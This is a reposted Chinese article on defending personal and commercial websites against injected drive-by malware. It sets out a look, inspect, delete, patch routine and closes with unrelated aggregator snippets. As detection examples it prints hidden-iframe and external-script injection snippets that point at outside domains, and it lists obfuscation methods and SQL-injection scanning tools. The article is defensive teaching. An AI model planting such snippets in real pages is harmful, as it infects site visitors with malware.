个人(商业)网站安全维护-网页***防范

news/2024/5/13 10:04:34/文章来源:https://blog.csdn.net/weixin_34007020/article/details/85177334
个人(商业)网站安全维护-网页***防范<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

simeon
本文已被网管员世界杂志录用

     现在国内有许多个人或者公司都建立了网站,网站已经成为日常生活的一部分,而网络钓鱼、网络诈骗、网络盗号等安全问题层出不穷。对于个人(商业)网站安全来讲,其网页挂马危害最大,如今的挂马者主要追寻商业利益,***程序多是量身订做的,隐蔽性强,危害性大,加上近两年来,许多***站点以及网络安全培训的兴起,作为一名“工具”***,不需要太多的专业知识,只需要看看录像,学会使用软件工具即可,在这种情况下对于个人(商业)网站的安全维护已经成为网络安全的一个研究课题,本文就个人(商业)网站的安全维护,尤其是网页***的防范进行了探讨,由于水平有限,不足之处,请多包涵。

(一)个人(商业)网站安全隐患分析

对于个人(商业)网站来讲,其安全主要受制以下一些因素:

1)租用服务器安全。租用服务器安全主要取决于该ISP提供商或者虚拟主机等服务提供商自身安全水平。如果该服务器安全无法得到一定程度上的保证,那么个人及其商业网站就无法得到保证。服务器安全主要是指服务器系统设置,补丁更新,防火墙设置,IIS安全设置,杀毒软件设置等。

注意:现在有很多个人为了追求商业利益,自己随便整一个服务器然后就开始了虚拟主机等服务,这些服务器的安全性往往很差,因此在找虚拟主机和网站空间时一定要认真选择,考虑综合实力相对较强的,否则服务器老是出问题会影响个人(公司)网络业务的开展。

2)网站程序安全。在服务器保证安全的前提下,程序Bug是网站安全的重大隐患。加上不少商业和个人网站采用第三方程序,第三方程序一旦出现安全漏洞,个人和商业网站极易受到***。

3)维护安全。维护安全主要是指当程序交付后并正式运行以后,网站需要单独的维护人员进行维护。对于个人网站来说,程序的维护往往通过Ftp相关程序上传新的程序文件来进行更新维护。如果ftp口令或者数据库口令被泄漏,其风险是不言而喻的。

     对于个人或者商业网站,***者在***成功以后,主要有以下目的:

1)获取相关有用信息。例如获取网站中的注册用户Email等个人信息,还有就是有针对性的获取商业信息。

2)作为***平台,在网站“挂马”。网站“挂马”是***者的惯用伎俩,主要利用操作系统漏洞,通过一些程序生成脚本文件或者网页,放入或者嵌入网站网页中,当用户访问时,***程序会被下载到本地并偷偷执行。

3)兴趣所致。***者或者安全爱好者进行实际技术的演练,或者就是一种***爱好。

(二)网站安全维护

    以上对个人(商业)网站的安全隐患进行了分析,对于网站管理人员如何来进行维护呢?其实很简单,通过笔者的分析研究,可以归纳为“一看”、“二查”、“三删”、“四堵”。下面分别进行分析。

 1、“一看”主要是指打开网站主页时进行观察。对于初级的挂马者而言,往往通过在网页中加入一段挂马代码。这段代码可能是js,可能是css,也可能是一段纯粹的html代码。其代码可能为以下三种:

1<iframe src="http://www.21cnhr.com/inc/about.asp" width="0" height="0" frameborder="0"></iframe><script>

2<script src="http://www.bdcrb.com/QQ/1.js"></script>

<?xml:namespace prefix = v ns = "urn:schemas-microsoft-com:vml" /><?xml:namespace prefix = w ns = "urn:schemas-microsoft-com:office:word" />3body { background-image: url('javascript:document.write("<script src=http://www.9xiao.net/9xiao.js></script>")')},其中xiao.js内容是 document.write("<iframe src=你的网马 width=0 height=0></iframe>")

说明:现在的杀毒软件也非常厉害,当访问的网站中存在网页***,杀毒软件会自动查杀的。

   如果在网站挂马以后,往往会产生一些表象,仔细观察会发现,在网站挂马以后,如果没有对地址栏进行处理,在用IE等浏览器打开时,浏览器地址栏会访问其它地址(图1)。
一般情况下是不会访问其它网站地址,这些地址往往就是挂马的地址,而且一些处理不好的挂马代码会导致一些错误提示,该错误提示一般在浏览器左下角以“黄色三角形”标识,双击该“黄色三角形”会显示具体的错误代码(图2),这些错误代码有可能是挂马站点未处理好,也有可能是挂马者在挂马时未处理好挂马代码。

注意:对于初级的挂马者,其网页***源代码可能没有加密,而大多数老手都对网页***源程序进行了加密,而且极有可能是多次加密。目前网上有很多提供网页加解密的网站(图3,图4,图5),一般来讲有以下一些:

1)通过Unicode码的转换实现的加密解密,但经过实验,中文文字太多会导致将你的页面代码膨胀,英文反会有压缩效果。

2)带密钥的加解密

3Base64编码加密,关于Base64编码加解密可以参考网页[url]http://www.dbxk.com/article/article/36/2005-12/20051228170628.html[/url] 以及[url]http://www.tyhome.com.cn/show_jdyk.asp?id=650[/url]

4md5的加密

5)微软的Encode加解密。微软提供了一个专业的网页脚本加密工具。加密时应只加密脚本部分,不加密脚本标记<script language="javascript">,并且加密后脚本标记应改为:<script language="JScript.Encode">

68进制和16进制转义字符串加解密

710进制和16进制HTML编码加解密

8escape加解密。escape()方法可以处理任何字符串对象或表达式。它返回一个 string 对象。其中所有的非字母字符被转换成按照%××表示的数字,××表示非字母字符对应的十六进制数。

9JS脚本加解密,Js脚本加解密有一个做的比较好的站点,大家可以直接访问:[url]http://dohi.cn/soft/MonyerEn.html[/url]以及[url]http://www.hao123.com/haoserver/jmjm.htm[/url]

2.“二查”主要是查看源代码。当然前面的观察也可以作为“二查”的依据,比如在浏览器访问该网站时,在地址栏中发现网站在访问其它地址,那么该地址可以作为查看挂马所在网页的一个最直接的方法,可以通过FrontPageXp等网页编辑工具直接在站点中查找包含该地址的Html网页。

注意:在查找时要选择在Html中查找。

    通过研究分析发现,挂马代码会直接以html方式显示,一般用户非管理员可以直接查看怀疑有挂马的网页源代码。方法为:在浏览器中单击“查看”-“查看源文件”就可以通过记事本打开,可以找到挂马代码。其效果如图6所示。

3.“三删”主要是指在站点中删除***者加入的挂马代码。对于普通用户来讲,如果发现有人在挂马,可以通过flashget、迅雷等下载软件直接下载存在挂马的网页,将挂马网页中存在的文件再次下载下来,然后提交给杀毒软件公司,嘿嘿,***者的马儿很快就会夭折。对于网站管理员来说,如果发现挂马,那么说明这个站点或者这个站点所在服务器已经失控,这个时候最好的办法就是使用备份文件重新覆盖,千万记得不要将旧的数据库覆盖新的数据库。好的方法是在覆盖时先将网站文件下载到本地做一个备份,以备不测。

4、“四堵”主要是指发现挂马后要及时堵漏。网站被挂马说明网站肯定存在漏洞,这个时候一定要仔细分析和检查。一些可以参考的建议:

1)使用明小子的domain3.5或者教主的HDSISQL注入软件进行注入漏洞扫描,当代码文件不是很多时,手动检查还可以,如果文件较多时,使用软件相对效果会好一些,而且容易发现漏洞。

2)更换数据库管理员密码。现在很多网站数据库都是采用md5加密,网上有大型md5在线破解数据库,即使复杂的md5密码也是很容易被破解的,因此更换数据库管理密码尤为重要。

3)更换服务器用户及其相关密码。网站跟服务器相比,显然***者会更喜欢服务器,毕竟下蛋的“鸡”比“蛋”重要。防止***者开放3389、根植***等,当然如果条件允许,建议使用备份文件恢复系统。

4)对服务器做一次完整的安全检查,如果没有进行操作系统的恢复,建议对服务器进行一次完整的安全检查,查看日志、进程、服务、系统文件等。

(三)结束语

   我常常在讲,网络安全是相对的,本文也仅仅是抛砖引玉,对网站维护的一个小的方面进行了探讨,作为从事网络安全的我们就应该将安全的东西变成不安全的东西,将不安全的东西变成安全的东西,让我们在网络安全的矛与盾中前进,欢迎致力于网络安全研究的您来与我们一起进行探讨。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_779174.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CURL方式使用代理访问网站

2019独角兽企业重金招聘Python工程师标准>>> curl_setopt ($ch, CURLOPT_URL, $requestUrl);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_PROXYAUTH, CURLAUTH_BASIC); //代理认证…

网站空间服务器100m,100M虚拟主机空间到底有多大?

很多新手站长朋友在购买空间的时候&#xff0c;总会心存疑问&#xff1a;到底买多大的主机空间合适&#xff0c;100M的空间够用吗,是不是选用越大的空间越好。其实&#xff0c;购买空间也讲究适可而止&#xff0c;够用即可&#xff0c;比如你是个人博客的站长&#xff0c;那100…

自动化测试网站

看到一个自动化测试的网站&#xff0c;记录一下&#xff1a; 有一下几个产品&#xff1a; TestComplete AQtime Automated Build Studio AQdevTeam 这里还有一个很好的自动化测试的PPT: http://www.automatedqa.com/community/ 参考文章&#xff1a; http://dragon.cnblogs.com…

美国高明公司推出首款中文网站性能监测方案

工业和信息化部在本月27日发布的一项统计数据显示&#xff0c;今年前三季度&#xff0c;中国新增宽带接入用户1644.9万户&#xff0c;用户总数达到9932.8万户。随着宽带接入用户的增加&#xff0c;中国互联网网民也在与日俱增&#xff0c;网民总数已达到3.6亿。这意味着有越来越…

优秀的国外电子商务网站欣赏

电子商务网站一直是网商们谈论的重点&#xff0c;包括他的策划、设计、经营等&#xff0c;今天我们着重介绍一下国外的电子商务网站的设计。先说国内的电子商务网站&#xff0c;由于凡客等的成功&#xff0c;国内大部分的电子商务网站都采用凡客的设计风格&#xff0c;这样的风…

Firefox 66 发布,阻止网站自动播放声音

开发四年只会写业务代码&#xff0c;分布式高并发都不会还做程序员&#xff1f; >>> Firefox 66 发布了&#xff0c;此版本在桌面版中带来的新特性包括&#xff1a; Firefox 现在阻止网站自动播放声音&#xff0c;如果需要可以单独调整改进的搜索体验&#xff1a; 当…

【发现资源共同分享】介绍一些web前台开发比较不错的网站【2012-06-14更新】

1. 模板之家&#xff08;强烈推荐&#xff09;中国divcss 模板中的精品网站 这个网站中的有很多现成的divcss做的模板供大家之间使用&#xff0c;最主要的是它是免费滴。而且图片已经切好、css文件已经写好、html demo也已经写好&#xff0c;您只需要改下里面的内容即可。…

您需要搭建怎样的网站来帮助您赚取更多利润?

做为一个有竞争力的企业&#xff0c;拥有自己的门户网站就像是建设自已的厂房一样重要&#xff0c;因为在信息时代&#xff0c;潜在客户通过互联网获取产品方案信息&#xff0c;并做为定单参考&#xff0c;已经是很多企业采购节省成本的主要方式之一。(当然其他还有很多好处&am…

python多页网站目录_想爬取一个有很多页的网站,但是我不知道这个网站的准确页数。请问 Python 中如何用循环来实现呢?...

25 2019-07-27 17:28:21 08:00 1 solider245 就是一般意义上我们说的二分查找&#xff0c;一般的程序员应该都了解的。 如果你这方面有缺失&#xff0c;我时间不多&#xff0c;只能在这里简单解释一下&#xff1a;假设我有一个有序的整数数组&#xff0c;我想要查询里面一个数…

常见的网站各种类型的页面缓存时间及http头

转载于:https://blog.51cto.com/ceekay/1083378

20款非常棒的网站可用性测试工具

2019独角兽企业重金招聘Python工程师标准>>> 网站可用性是指用户能否有效地找到所需的信息或完成他的任务&#xff0c;效率如何以及是否让人有愉快满意的感受。如果网站可用性较差&#xff0c;会浪费用户的时间&#xff0c;大大降低网站的回头访问率&#xff0c;这对…

网站攻击软件_如何防范误植攻击 | Linux 中国

误植是一种引诱用户将敏感数据泄露给不法分子的方式&#xff0c;针对这种攻击方式&#xff0c;我们很有必要了解如何保护我们的组织、我们的开源项目以及我们自己。-- Sam Bocetta误植Typosquatting是一种引诱用户将敏感数据泄露给不法分子的方式&#xff0c;针对这种攻击方式&…

16个时髦的扁平化设计的 HTML5 CSS3 网站模板

创建网站最好办法之一是使用现成的网站模板或使用开源 CMS 应用程序。所以&#xff0c;今天这篇文章给大家带来的是16款基于 HTML5 & CSS3 的精美的扁平风格网站模板&#xff0c;大家可以借助这些优秀的网站模板创建自己的优秀网站。这些网站模板虽然是收费&#xff0c;但是…

如今的SEO与以往的SEO有何不同?

1. SEO的术语解释SEO在2000-2011年之间都是针对于主流搜索引擎友好度的一种网站站内外技术与内容的优化。通过接近搜索引擎算法的一种手段&#xff0c;所以称之为Search Engine Optimization (搜素引擎优化)。而从2011 – 2014年开始&#xff0c;搜索引擎优化不只局限在代码、内…

apache php网站,Apache,mysql,PHP搭建网站环境

须要用到三个压缩包&#xff1a;php各模块配置&#xff1a;Apache&#xff1a;下载&#xff0c;解压安装vc2015运行库bin目录下&#xff0c;管理员权限执行httpd -k install安装服务安装成功后&#xff0c;此目录下双击ApacheMonitor启动apache如出现错误(1.查看一下是不是端口…

使用ClipFinder HD搜索和查看多个视频网站

If you’re looking for an easy way to search through several video websites at once from your desktop, today we take a look at an app that does an excellent job. Ashampoo’s ClipFinder HD allows you to search and download videos from popular video sites f…

谭晓威个人博客网站

经过前一段时间的折腾&#xff0c;个人博客网站终于开始上线运作了&#xff0c;从选择主机到搭建环境&#xff0c;从注册域名到域名备案&#xff0c;特别是备案&#xff0c;很是麻烦呀&#xff0c;不过终于搞定了&#xff0c;在此打个小广告&#xff0c;欢迎朋友们前来支持&…

全球第2大同性交友网站曝光,2022程序员现状

全球第二大同性社交网站 提到全球最大的同性社交网站&#xff0c;大家马上想到Github。 Github是技术人的聚集地&#xff0c;因为程序员以男人居多&#xff0c;所以被网友戏称为全球最大的同性社交网站。 还有一个网站&#xff0c;它的世界编程者心中的地位&#xff0c;就像知…

cortana 无法使用_如何使用Microsoft Edge和Cortana创建网站提醒

cortana 无法使用Want to set a web page aside and come back to it in the future? If you use Microsoft Edge in Windows 10’s Creators Update, you don’t have to leave the tab open or bookmark it and remember to come back. You can tell Cortana to remind you …

电影下载网站收集

为什么80%的码农都做不了架构师&#xff1f;>>> 1.小浣熊下载站&#xff1a;http://www.xiaohx.com/ 2.97电影网&#xff1a;http://www.id97.com/ 转载于:https://my.oschina.net/miger/blog/483343